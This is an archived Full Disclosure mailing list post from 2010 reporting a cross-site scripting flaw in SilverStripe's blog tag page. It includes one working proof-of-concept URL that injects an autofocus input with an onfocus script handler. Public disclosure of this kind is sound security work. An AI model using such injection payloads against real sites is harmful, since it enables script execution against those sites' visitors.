Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Fwd: xss in silverstripe
From: dave b <db.pub.mail () gmail com>
Date: Mon, 4 Oct 2010 14:03:04 +1100

Bugtraq seem to be having problems :/ (this is the only reason I sent
this to full disclosure I don't like wasting people's time with xss on
this list).


---------- Forwarded message ----------
From: dave b <db.pub.mail () gmail com>
Date: 4 October 2010 13:48
Subject: xss in silverstripe
To: bugtraq () securityfocus com


Look I know xss are lame but silverstripe is vulnerable ...

http://www.silverstripe.com/blog/tag/%20%3Cinput%20type=%22text%22%20AUTOFOCUS%20onfocus=alert%281%29%3E

I love html5!

--
The better part of valor is discretion.         -- William
Shakespeare, "Henry IV"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Fwd: xss in silverstripe dave b (Oct 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault